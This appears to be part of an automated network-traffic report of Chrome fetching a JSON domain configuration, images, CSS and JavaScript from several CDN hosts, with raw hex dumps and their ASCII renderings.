                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:58 UTC467INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:58 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache28.l2hk2[3,0], ens-cache10.de7[219,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b5839e17179728583288965e
                                                                                                                                                          2024-06-09 22:40:58 UTC1462INData Raw: 35 61 66 0d 0a 7b 0a 20 20 20 20 22 6e 6e 6e 22 3a 20 22 6f 75 74 65 72 2d 38 38 38 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 6d 22 3a 20 22 32 34 30 36 30 36 2d 30 31 22 2c 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 70 63 5f 6d 65 6d 62 65 72 22 3a 20 22 32 34 30 35 32 39 2d 30 31 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 44 4e 5f 50 41 54 48 53 22 3a 20 5b 22 7a 62 2d 71 71 2e 67 7a 6a 71 77 6c 6b 6a 2e 63 6f 6d 22 2c 22 7a 62 31 2d 68 77 2e 71 65 63 74 79 6f 75 61 2e 63 6f 6d 22 2c 22 7a 62 2d 68 77 2e 63 7a 77 79 67 73 2e 63 6f 6d 22 5d 2c 0a 20 20 20 20 20 20 20 20 22 41 50 49 5f 44 4f 4d 41 49 4e 53 22 3a 20 5b 22 6f 63 73 61 70 69 2d 6c 63
                                                                                                                                                          Data Ascii: 5af{ "nnn": "outer-888", "versions": { "zb_m": "240606-01", "zb_pc_member": "240529-01" }, "http": { "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"], "API_DOMAINS": ["ocsapi-lc
                                                                                                                                                          2024-06-09 22:40:58 UTC9646INData Raw: 32 35 61 36 0d 0a 69 6f 6e 22 3a 20 22 30 34 2e 6d 6f 62 69 6c 65 70 72 6f 76 69 73 69 6f 6e 22 2c 20 0a 20 20 20 20 22 67 62 5f 73 77 5f 6d 6f 64 65 22 3a 20 7b 22 68 35 22 3a 20 66 61 6c 73 65 2c 20 22 70 63 22 3a 20 66 61 6c 73 65 7d 2c 0a 20 20 20 20 22 67 62 5f 68 63 61 70 74 63 68 61 5f 76 65 72 22 3a 20 22 30 35 2d 77 65 62 22 2c 0a 20 20 20 20 22 67 62 5f 70 61 73 73 5f 62 79 5f 73 6d 73 22 3a 20 5b 22 61 65 30 30 22 5d 2c 0a 20 20 20 20 22 67 62 5f 77 61 73 6d 5f 74 6f 6f 6c 5f 76 65 72 22 3a 22 30 31 22 2c 0a 20 20 20 20 22 67 62 5f 63 6f 6d 6d 6f 6e 5f 64 6f 6d 61 69 6e 22 3a 5b 22 7a 62 2d 61 6c 69 2e 69 74 79 75 72 79 75 72 2e 63 6f 6d 22 2c 20 22 7a 62 31 2d 68 77 2e 7a 76 6a 73 70 6a 73 6d 2e 63 6f 6d 22 2c 20 22 7a 62 2d 68 77 2e 63 7a 77
                                                                                                                                                          Data Ascii: 25a6ion": "04.mobileprovision", "gb_sw_mode": {"h5": false, "pc": false}, "gb_hcaptcha_ver": "05-web", "gb_pass_by_sms": ["ae00"], "gb_wasm_tool_ver":"01", "gb_common_domain":["zb-ali.ityuryur.com", "zb1-hw.zvjspjsm.com", "zb-hw.czw
                                                                                                                                                          2024-06-09 22:40:58 UTC1461INData Raw: 35 61 65 0d 0a 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 38 36 32 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 38 36 33 22 3a 20 7b 22 76 22 3a 22 32 32 30 38 31 35 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 38 36 34 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 38 36 35 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 38 36 36 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 38 36 37 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74
                                                                                                                                                          Data Ascii: 5aev":"221007-01","t":104},"t3862": {"v":"230607-01","t":101},"t3863": {"v":"220815-01","t":108},"t3864": {"v":"221007-01","t":108},"t3865": {"v":"221007-01","t":104},"t3866": {"v":"240516-03","t":101},"t3867": {"v":"221007-01","t":101},"t
                                                                                                                                                          2024-06-09 22:40:58 UTC5841INData Raw: 31 36 63 39 0d 0a 7b 22 76 22 3a 22 32 33 30 36 32 30 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 39 30 34 22 3a 20 22 32 33 31 30 30 35 2d 30 31 22 2c 0a 09 22 74 33 39 30 35 22 3a 20 22 32 33 30 36 30 37 2d 30 31 22 2c 0a 09 22 74 33 39 30 39 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 39 31 30 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 39 7d 2c 0a 09 22 74 33 39 31 32 22 3a 20 22 32 33 31 30 30 35 2d 30 31 22 2c 0a 09 22 74 33 39 31 34 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 32 30 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 39 31 37 22 3a 20 7b 22 76 22 3a 22 32 33 30 33 31 32 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 39
                                                                                                                                                          Data Ascii: 16c9{"v":"230620-01","t":104},"t3904": "231005-01","t3905": "230607-01","t3909": {"v":"230607-01","t":108},"t3910": {"v":"240516-03","t":109},"t3912": "231005-01","t3914": {"v":"230620-01","t":108},"t3917": {"v":"230312-01","t":101},"t39
                                                                                                                                                          2024-06-09 22:40:58 UTC13INData Raw: 38 0d 0a 31 30 31 7d 0a 7d 0a 7d 0d 0a
                                                                                                                                                          Data Ascii: 8101}}}
                                                                                                                                                          2024-06-09 22:40:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          197192.168.2.54994090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:58 UTC367OUTGET /pc/image-pc/video/guide.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:58 UTC634INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:58 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 75656
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Sat, 24 Aug 2019 10:08:29 GMT
                                                                                                                                                          ETag: "5d610c9d-12788"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[2],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE4[295],EU-GER-frankfurt-GLOBAL1-CACHE12[290,TCP_MISS,293],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9aed47bef9d103bb7a6edd3323f03506
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814487
                                                                                                                                                          X-CCDN-Expires: 2464134
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:58 UTC15750INData Raw: ff d8 ff db 00 84 00 02 01 01 01 01 01 02 01 01 02 03 02 01 02 03 03 02 02 02 02 03 03 03 03 03 03 03 03 05 03 04 04 04 04 03 05 05 05 06 06 06 05 05 07 07 08 08 07 07 0a 0a 0a 0a 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 02 02 02 04 03 04 07 05 05 07 0a 08 07 08 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff dd 00 04 00 53 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 02 20 02 93 03 00 11 00 01 11 01 02 11 01 ff c4 00 ad 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 03 03 03 02 05 02 04 04 04 03 06 05 02 07 01 00 02 03
                                                                                                                                                          Data Ascii: SAdobed
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: af fb a8 90 9e db 2e 16 6f 26 c8 b2 c9 b5 3e 61 ce 77 e7 75 9e 86 c7 0c cf 0c 2e cf 1d 82 44 58 aa 2b d5 45 ba 4f 3a 12 46 39 69 e0 a8 ce 09 90 91 32 b3 ae 9c 23 d5 4f 03 44 c4 7e 6f 95 99 f1 d0 b5 b3 21 78 ba 54 dc 2a 5d 55 50 73 2b b6 c1 e0 27 aa 8f 82 c8 24 51 dc 66 c3 09 f6 e5 51 22 c4 66 eb aa 4b ce 91 ef ca ae 4c 91 92 ea 8a b3 af 46 76 1b a7 89 8c c8 75 2d 68 6d 23 80 38 6a d1 07 6c b1 ae 8c 64 ef 32 b8 ef b8 dd 74 31 33 34 86 8b 88 db bf 2b 6c 19 54 fc 05 8d 5b f3 ee b4 45 99 32 44 69 e0 97 11 f0 b5 e3 67 3f 3c 41 11 04 e4 2d 31 39 53 5d 93 61 76 30 7b 2d 11 66 79 22 ca 89 fa 48 2e f8 5a a0 cc f3 45 bd 14 c0 38 2b 13 31 64 46 82 d2 03 18 d7 bb 92 73 fe ca d8 9c cc c5 a4 2e 25 5c 63 92 25 b5 df cb 24 77 0a 44 29 11 e5 7e 4a 09 24 56 de 70 31 37 6e
                                                                                                                                                          Data Ascii: .o&>awu.DX+EO:F9i2#OD~o!xT*]UPs+'$QfQ"fKLFvu-hm#8jld2t134+lT[E2Dig?<A-19S]av0{-fy"H.ZE8+1dFs.%\c%$wD)~J$Vp17n
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 3b d8 a7 19 f6 46 4a d1 6a da b6 96 07 11 9d b9 5a 77 30 b8 50 66 ae 36 0d 4f d9 a3 92 93 c9 43 50 65 35 7d d0 d4 d4 38 83 98 db b0 ca cf 2c b6 cd d8 f1 52 11 4f 53 ea d9 4e 13 1c a0 5a 50 d6 e8 c6 4f a7 b2 d5 09 99 67 02 d6 0b af 95 11 79 3c 70 55 b6 63 96 1b 63 94 77 99 62 3a e3 79 69 e7 3d 92 f2 4b 47 1f 05 ed bb ae aa e9 d9 e5 ca 75 7f ba 1c 51 a6 1c c9 c4 9f 1f 88 64 37 0e 69 50 f6 cb 57 a9 35 f0 53 f5 17 53 4b 77 7f e6 22 00 38 f7 56 45 51 9b 3e 77 99 fd 23 35 5d 3e a2 70 54 ac 94 22 55 54 c9 b9 2a 13 66 c8 22 ba a2 4c 92 4f 0b 34 d9 a6 28 8d 21 e7 dd 56 5c 31 21 db 75 19 32 51 1b 7b 9c 1a 00 50 6c 9a 1a 71 cb b3 d9 56 d9 30 15 00 f0 21 f1 92 77 08 a0 b1 a9 a9 cb c6 7b 05 09 44 92 90 d7 90 1a 76 1b aa f4 25 6c 7a 38 f7 18 0a 51 8f 64 59 3a 9a 23 26
                                                                                                                                                          Data Ascii: ;FJjZw0Pf6OCPe5}8,ROSNZPOgy<pUccwb:yi=KGuQd7iPW5SSKw"8VEQ>w#5]>pT"UT*f"LO4(!V\1!u2Q{PlqV0!w{Dv%lz8QdY:#&
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: ed 94 38 b9 c4 0c 00 ec ab e3 33 3b 83 34 be 23 f5 bd 1b e9 a3 a0 a8 8e 46 be 9a 5d 24 9c 1c 92 d0 14 32 41 ea 99 3c 52 5b 34 57 d8 29 2f 3d 41 71 a7 b6 d8 69 df 35 ca a1 cd 65 3c 6d 21 ae 2e 3e a1 bf 65 08 75 d8 f2 bb 54 7b 1b c6 ee 8a 1d 29 e0 17 4f 75 6f 49 4b f8 7e a0 7b 69 69 6b 1c e7 12 75 f9 67 5b 7d 5b 67 50 ee 16 3e 26 47 2c d2 4d f4 68 cb 04 b1 a6 bc 9c ce e5 f5 db e3 85 aa 99 b6 9b e5 25 05 54 70 30 44 1d 24 6f 8d fa 58 34 82 4b 08 19 56 cb d2 b1 c9 f9 64 3f 79 28 fc 1e 70 eb 9e a6 9b aa 7a 82 b3 a8 1f 0b 63 9e b6 67 d4 ca c0 f7 16 87 3c e4 81 9d d6 e4 9c 22 a3 f4 64 b5 27 65 15 0d 96 e5 7b 96 58 e8 c3 33 10 d6 e0 e7 63 62 71 b2 a2 6d 9a 20 91 0e e3 d2 d7 a8 5e 59 2b 1b 86 ec 70 e1 85 44 ac be 2d 22 a3 0e 86 6d 12 34 ea 69 c1 c6 39 0a b5 22 db
                                                                                                                                                          Data Ascii: 83;4#F]$2A<R[4W)/=Aqi5e<m!.>euT{)OuoIK~{iikug[}[gP>&G,Mh%Tp0D$oX4KVd?y(pzcg<"d'e{X3cbqm ^Y+pD-"m4i9"
                                                                                                                                                          2024-06-09 22:40:58 UTC10754INData Raw: 84 a6 91 7c 38 93 97 84 5b 54 78 3b d4 71 40 6b ae b5 14 94 64 6e e8 df 2f 98 7f fa 58 0e 54 16 5f ab 34 2f 4d 9f e1 14 5f f6 3a ba aa 42 2a a7 89 8d c9 2c 73 3d 04 81 df 4a b6 d2 1a f4 e9 7d 93 ac fe 12 dd 7a 84 7e 2e df 23 3c 98 c9 63 9f 21 6b 58 d2 3b ee 54 65 91 44 b2 3e 9d 7f 21 5e bc 1a 82 d3 4b 25 5d 6f 51 52 8a e8 da 5e ca 76 07 39 ce 23 7c 65 bb 6e 92 ca df 84 12 f4 ed 57 f9 1c e3 cc 06 47 3a a4 98 dd 92 4e 78 03 d8 2b ac c0 d0 ba 99 a6 22 39 58 74 b1 bc 82 01 d4 3b 7b 24 81 21 b7 b1 93 9d 55 59 f2 c9 f4 b5 bf e9 9e 11 74 4a 82 67 91 15 43 64 66 a3 11 f4 e3 9c 1f 64 58 a8 94 c7 46 d3 23 5e f1 1b 3b 34 9d f3 8e 02 8b 62 d4 8d 7a b9 cd 6f e9 aa 96 40 58 e8 6a 31 15 40 76 c1 f8 39 0d cf 3f b2 96 35 72 2f e3 3d 59 ce ee 35 34 12 35 cd 96 49 62 9b 3b
                                                                                                                                                          Data Ascii: |8[Tx;q@kdn/XT_4/M_:B*,s=J}z~.#<c!kX;TeD>!^K%]oQR^v9#|enWG:Nx+"9Xt;{$!UYtJgCdfdXF#^;4bzo@Xj1@v9?5r/=Y545Ib;


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          198192.168.2.549942183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:58 UTC575OUTGET /ftl/commonPage/js/theme/default/layer.css?v=3.1.0 HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:59 UTC688INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 3111
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-CHANGZ-MP-01-10
                                                                                                                                                          ETag: W/"6131d862-48e4"
                                                                                                                                                          Date: Thu, 06 Jun 2024 13:00:25 GMT
                                                                                                                                                          Last-Modified: Fri, 03 Sep 2021 08:10:10 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 13:00:25 GMT
                                                                                                                                                          Age: 294033
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;changzmp01:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-CHANGZ-MP-01-10
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-11
                                                                                                                                                          X-Cdn-Request-ID: 4c14ea54f595ed991a84a909d056c751
                                                                                                                                                          2024-06-09 22:40:59 UTC3111INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 6b 6f db 38 f2 7b 7f 85 b0 45 81 24 57 79 25 cb ef a2 c0 b5 4d bb 57 60 81 03 16 7b 40 0f 77 87 40 b6 68 9b 88 2c 09 92 9c 38 3d ec 7f 3f 52 7c 88 6f d1 49 53 74 81 b3 1b bb e2 63 5e 1c ce 90 9c a1 47 79 fa 70 84 21 fa 04 75 08 0f bb 75 5a bf 0e 46 4a 61 0b db 20 55 8a db 74 ad 14 c0 36 07 41 53 a5 85 da b2 ab f8 ef 8b 00 bd 5a 70 6a c3 f2 0e d4 db bc bc 5f 05 20 cf 61 d5 c0 e6 4d 57 79 bf 87 2d 08 11 84 0d 58 05 45 79 5f a7 d5 8b 3f 5e bc d8 b7 87 3c 78 d9 41 dc 34 0d 01 4a c1 65 b0 a9 d0 33 6e 5d 00 02 a4 2a 1b d8 c2 b2 58 05 e9 ba 29 f3 63 4b cb ef 61 d6 ee 57 41 bc 5c 2c ab 13 06 2b d2 a8 50 dc ec d3 8c 51 dc c3 db c2 13 c8 08 b0 1b 1b 96 aa 84 45 8b 20 80 3b 50 b4 0d aa 3d b6 a5 8a 4c 02 df 96 d5 2a 88 48 e7 1c 6c
                                                                                                                                                          Data Ascii: ko8{E$Wy%MW`{@w@h,8=?R|oIStc^Gyp!uuZFJa Ut6ASZpj_ aMWy-XEy_?^<xA4Je3n]*X)cKaWA\,+PQE ;P=L*Hl


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          199192.168.2.549943183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:58 UTC586OUTGET /061410/rcenter/common/js/jquery/plugins/jquery.validate/jquery.validate.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:59 UTC705INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 7746
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-24-30
                                                                                                                                                          ETag: W/"655579ca-6caf"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:05:06 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:05:06 GMT
                                                                                                                                                          Age: 297352
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xymp24:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-24-30
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-27
                                                                                                                                                          X-Cdn-Request-ID: 8401a9bc4462956b71cba5be546f7bba
                                                                                                                                                          2024-06-09 22:40:59 UTC7746INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 3d 6b 77 db c6 b1 df fb 2b 20 54 a1 01 13 22 25 27 6d 13 32 88 ea fa 71 9a 7b 92 34 37 71 d3 73 4a 32 bd 10 09 49 88 49 40 05 40 db 2a 89 fe ac fb 07 ee 1f bb f3 da 17 08 48 b2 d3 e6 b4 27 15 81 dd d9 d9 d9 d9 d9 d9 79 ec c2 e3 c7 47 bf f2 1e 7b 3f fd f7 36 2d 6f bd 1f 92 75 b6 4a ea ac c8 bd 6f d7 db ab 2c f7 de 9c 8d ce 3e 1e 9d 01 0c 82 5d d7 f5 cd 64 3c fe e9 ef 08 fd 46 03 8f 8a f2 6a 2c 20 cf 8a 9b db 32 bb ba ae bd 60 19 7a 4f 4e cf 3e f1 fe eb ff fe b7 cc bd bf 26 e9 e5 65 5a a6 25 42 7d 97 ae d3 a4 4a 57 de 36 5f a5 a5 57 5f a7 de d7 5f be f2 d6 d9 32 cd ab 14 20 c6 bf 0a 2e b7 f9 12 b1 07 97 c9 b2 2e ca db 70 97 5d 06 f5 ed 4d 5a 5c 7a ab f4 32 cb d3 38 8e 7d 05 e5 0f 06 5c 38 4a 36 ab 70 c7 cf c1 cc 67 5a fd 45
                                                                                                                                                          Data Ascii: =kw+ T"%'m2q{47qsJ2II@@*H'yG{?6-ouJo,>]d<Fj, 2`zON>&eZ%B}JW6_W__2 ..p]MZ\z28}\8J6pgZE


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          200192.168.2.54994590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:58 UTC554OUTGET /cc.png?r=1707849192 HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:59 UTC606INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:59 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[310],EU-GER-frankfurt-EDGE5-CACHE3[301,TCP_MISS,304],EU-FRA-paris-GLOBAL1-CACHE8[293],EU-FRA-paris-GLOBAL1-CACHE30[289,TCP_MISS,292],1.1 google
                                                                                                                                                          X-CCDN-Origin-Time: 276
                                                                                                                                                          x-hcs-proxy-type: 0
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 57b57f6a598f23a595c8558ebca7adfc
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:59 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          201192.168.2.54994143.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:58 UTC361OUTGET /cc.png?r=2281974097 HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:59 UTC340INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:58 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
